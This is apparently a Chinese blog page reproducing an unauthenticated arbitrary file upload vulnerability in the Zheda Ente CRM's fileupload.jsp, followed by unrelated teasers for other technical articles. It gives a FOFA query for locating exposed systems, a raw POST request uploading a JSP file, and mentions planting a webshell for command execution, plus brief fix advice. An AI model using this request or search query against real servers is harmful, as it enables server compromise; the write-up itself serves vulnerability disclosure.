浙大恩特客户资源管理系统任意文件上传漏洞复现
0x01 产品简介
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
0x02 漏洞概述
浙大恩特客户资源管理系统中fileupload.jsp接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
0x03 复现环境
FOFA:app="浙大恩特客户资源管理系统"
0x04 漏洞复现
PoC
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Encoding: gzip, deflate123
回显了上传路径
验证
上传马子
命令执行
0x05 修复建议
关闭互联网暴露面或设置接口访问权限
升级至安全版本
相关文章:
浙大恩特客户资源管理系统任意文件上传漏洞复现
0x01 产品简介 浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。 0x02 漏洞概述 浙大恩特客户资源管理系统中fileupload.jsp接口处存在文件上传漏洞,未经身份认…...
史上第一款AOSP开发的IDE (支持Java/Kotlin/C++/Jni/Native/Shell/Python)
ASFP Study 史上第一款AOSP开发的IDE (支持Java/Kotlin/C/Jni/Native/Shell/Python) 类似于Android Studio,可用于开发Android系统源码。 Android studio for platform,简称asfp(爱上富婆)。 背景&下载&使用 背景 由…...
GCC + Vscode 搭建 nRF52xxx 开发环境
在 Windows 下使用 GCC Vscode 搭建 nRF52xxx 开发环境 ...... by 矜辰所致前言 最近有遇到项目需求,需要使用到 Nordic 的 nRF52xxx 芯片,还记得当初刚开始写博文的时候的写的 nRF52832 学习笔记,现在看当时笔记毫无逻辑可言,…...
Linux应用开发基础知识——Framebuffer 应用编程(四)
前言: 在 Linux 系统中通过 Framebuffer 驱动程序来控制 LCD。Frame 是帧的意 思,buffer 是缓冲的意思,这意味着 Framebuffer 就是一块内存,里面保存着 一帧图像。Framebuffer 中保存着一帧图像的每一个像素颜色值,假设…...
智安网络|数据库入门秘籍:通俗易懂,轻松掌握与实践
在现代信息化时代,数据库已成为我们日常生活和工作中不可或缺的一部分。然而,对于非专业人士来说,数据库这个概念可能很抽象,难以理解。 一、什么是数据库? 简单来说,数据库是一个存储和管理数据的系统。它…...
EXCEL中安装多个vsto插件,插件之间互相影响功能,怎么解决
在 Excel 中安装多个 VSTO 插件,并且这些插件之间存在互相影响的情况下,可以采取以下措施来解决问题: 1. **隔离插件功能:** - 确保每个 VSTO 插件都有清晰的功能和责任范围,避免不同插件之间的功能重叠。这可以通…...
Java枚举
枚举类 概念 Java中的枚举(Enumeration)是一种特殊的数据类型,它是一种包含固定常量的类型。枚举是一种更加类型安全和更易维护的方式来定义常量,它包含了一组命名的值。 enum Weekday {MONDAY, TUESDAY, WEDNESDAY, THURSDAY,…...
基于MATLAB的关节型六轴机械臂轨迹规划仿真
笛卡尔空间下的轨迹规划,分为直线轨迹规划和圆弧轨迹规划,本文为笛卡尔空间下圆弧插值法的matlab仿真分析 目录 1 实验目的 2 实验内容 2.1标准D-H参数法 2.2实验中使用的Matlab函数 3 全部代码 4 仿真结果 1 实验目的 基于机器人学理论知识&…...
双11狂欢最后一天
大家好,本年度双11即将到来,为了答谢大家多年来的支持及更广泛的推广VBA的应用,“VBA语言専功”在此期间推出巨大优惠:此期间打包购买VBA技术资料实行半价优惠。 1:面向对象:学员及非学员 2:打…...
YOLOX: Exceeding YOLO Series in 2021(2021.8)
文章目录 AbstractIntroduction介绍前人的工作提出问题解决 YOLOXYOLOX-DarkNet53Implementation detailsYOLOv3 baselineDecoupled headStrong data augmentationAnchor-freeMulti positivesSimOTAEnd-to-end YOLOOther BackbonesModified CSPNet in YOLOv5Tiny and Nano dete…...
HBuilderX 运行Android App项目至雷电模拟器
一、下载安装HBuilderX HBuildeX官网 安装最新的正式版,或者点击历史版本查看更多版本;【ps:Alpha版本为开发版,功能更多,但是也不稳定,属于测试版本】 直接将压缩包解压,运行HBuildeX即可。 二…...
Java进阶(JVM调优)——阿里云的Arthas的使用 安装和使用 死锁查找案例,重新加载案例,慢调用分析
前言 JVM作为Java进阶的知识,是需要Java程序员不断深度和理解的。 本篇博客介绍JVM调优的工具阿里云的Arthas的使用,安装和使用,命令的使用案例;死锁查询的案例;重新加载一个类信息的案例;调用慢的分析案…...
续:将基于Nasm汇编的打字小游戏,移植到DOSBox
续:将基于Nasm汇编的打字小游戏,移植到DOSBox 文章目录 续:将基于Nasm汇编的打字小游戏,移植到DOSBox前情提要细说1 编译2 程序入口3 定位段 运行体验 前情提要 上一篇:【编程实践】黑框框里的打字小游戏,但…...
外部访问K8S集群内部的kafka集群服务
不许转载 kafka 部署 把 kafka 部署到 k8s 后,我们肯定是通过 service 从 k8s 外部访问 kafaka。这里的 service 要么是 NodePort, 要么是 LoadBalancer 类型。我们使用的方式是 LoadBalancer。 我们先看下面这张图,这是 kafka 在集群中的网…...
AttributeError: module ‘tensorflow‘ has no attribute ‘contrib‘解决办法
在TensorFlow2环境下执行1.X版本的代码时报错: AttributeError: module ‘tensorflow‘ has no attribute ‘contrib‘ 当然第一时间想到的是利用 如下代码 来解决问题(大部分情况都是这样), tf.compat.v1但是又出现以下报错 Att…...
物奇平台耳机恢复出厂设置功能实现
是否需要申请加入数字音频系统研究开发交流答疑群(课题组)?可加我微信hezkz17, 本群提供音频技术答疑服务,+群赠送语音信号处理降噪算法,蓝牙音频,DSP音频项目核心开发资料, 物奇平台耳机恢复出厂设置功能实现 一 需求 1 耳机接收到充电盒长按12S指令后触发, 2 接收到…...
RFID携手制造业升级,为锂电池生产带来前所未有的可靠性
应用背景 随着科技的发展和全球化的推进,产品的生产过程越来越复杂,且对品质的要求也越来越高。在锂电池生产领域,由于其高能量密度、长寿命和环保特性,已被广泛应用于电动汽车、储能系统等领域。然而,锂电池的安全性和…...
 三方工具使用)
【星海出品】flask (四) 三方工具使用
学习的灵魂是公社,学习的目标是人民自治.学习是非暴力革命方式的社会改革.学习是人民对抗资本剥夺的文明方式.学习失败了,就如同巴黎公社失败了一样.但是它为今后进行成功的社会改革指明了正确的方向.学习的逻辑并不复杂,一句话,必须让知识数量与知识价值基本吻合.管理学习也不…...
MongoDB 索引
类似关系型数据库,mongodb也建立自己的一套索引机制和查询优化方法。本文简单介绍mongodb的索引。后续文章讲详细介绍索引的操作,监控和查询优化方法等。 索引 索引,是一组按照特殊结构排列的,方便检索的数据。索引中保存了集合…...
[Hive] INSERT OVERWRITE DIRECTORY要注意的问题
在使用Hive的INSERT OVERWRITE语句时,需要注意以下问题: 数据覆盖:INSERT OVERWRITE语句会覆盖目标目录中的数据。因此,在执行该语句之前,请确保目标目录为空或者你希望覆盖的数据已经不再需要。数据格式:…...
【仅限本周】Docker集群配置终极checklist:覆盖安全加固、日志聚合、滚动升级共12项SRE认证标准
第一章:Docker集群配置的SRE认证标准全景概览 SRE(Site Reliability Engineering)认证体系对容器化基础设施提出了明确的可观测性、可靠性与自动化治理要求。在Docker集群层面,认证标准不仅覆盖单节点运行时合规性,更强…...
EF Core 10向量查询延迟突增2700ms?揭秘SQL Server 2022向量索引与LINQ表达式树编译冲突真相
第一章:EF Core 10向量搜索扩展的演进与定位EF Core 10 向量搜索扩展并非官方内置功能,而是由社区驱动、面向 AI 增强型应用的重要生态补充。它标志着 Entity Framework Core 从传统关系型查询范式,正式迈向支持语义检索、相似性匹配与嵌入式…...
从“必备”到“装X”:我的VSCode插件分层管理法,效率提升不止亿点点
从“必备”到“装X”:我的VSCode插件分层管理法,效率提升不止亿点点 作为一名长期与VSCode为伴的开发者,我深知插件管理的重要性。起初,我也像大多数人一样,看到推荐就安装,结果导致编辑器启动缓慢、内存占…...
用 Playwright + Claude Code 做自动化测试:一套从0到1跑通的实战流程
最近有同学问我一个问题: “现在越来越多公司的校招测开岗开始关注 AI 使用能力,我需要准备到什么程度?” 先说一个更现实的结论: AI 使用能力正在成为加分项,但还远没到“不会就没机会”的程度。 企业更看重的&#x…...
)
别再乱设帧率了!用DaVinci Resolve 18剪辑前,先搞定这3个关键设置(新手避坑)
别再乱设帧率了!用DaVinci Resolve 18剪辑前,先搞定这3个关键设置(新手避坑) 刚接触DaVinci Resolve的新手们,往往迫不及待地想要开始剪辑,却忽略了前期设置的重要性。错误的帧率选择、不当的缓存位置设置以…...
ZLibrary架构揭秘:数字资源分发的技术前沿
从ZLibrary入口看数字资源分发架构的技术文章大纲引言数字资源分发在互联网时代的核心作用ZLibrary作为典型案例的背景介绍文章结构概述ZLibrary的技术架构分析前端入口设计:域名系统与访问路由负载均衡与高可用性实现方案分布式存储系统的数据组织方式资源分发关键…...
)
瑞萨RL78单片机Bootloader实战:手把手教你配置User工程(CS+ for CACX环境)
瑞萨RL78单片机Bootloader实战:CS for CACX环境下的User工程全流程配置 在嵌入式系统开发中,Bootloader的设计与实现往往是项目成功的关键一环。不同于常见的ARM架构单片机,瑞萨RL78系列在Bootloader开发方面的公开资料相对匮乏,这…...
BililiveRecorder录播引擎深度解析:3大核心架构与5项企业级部署策略
BililiveRecorder录播引擎深度解析:3大核心架构与5项企业级部署策略 【免费下载链接】BililiveRecorder 录播姬 | mikufans 生放送录制 项目地址: https://gitcode.com/gh_mirrors/bi/BililiveRecorder BililiveRecorder作为一款专注于B站直播录制的开源工具…...
real-anime-z在跨媒体叙事中的应用:小说文本→角色图→分镜图→动态预告片链路
real-anime-z在跨媒体叙事中的应用:小说文本→角色图→分镜图→动态预告片链路 1. 跨媒体叙事的新工具 在内容创作领域,跨媒体叙事正变得越来越重要。从小说文本到视觉呈现,再到动态视频的完整创作链路,能够帮助创作者将想法快速…...
基于springboot的高校教材订阅选购管理系统
目录同行可拿货,招校园代理 ,本人源头供货商高校教材订阅选购管理系统的功能分析用户管理模块教材管理模块订阅与选购模块订单与支付模块统计与报表模块系统管理模块技术实现要点扩展功能(可选)项目技术支持源码获取详细视频演示 :文章底部获…...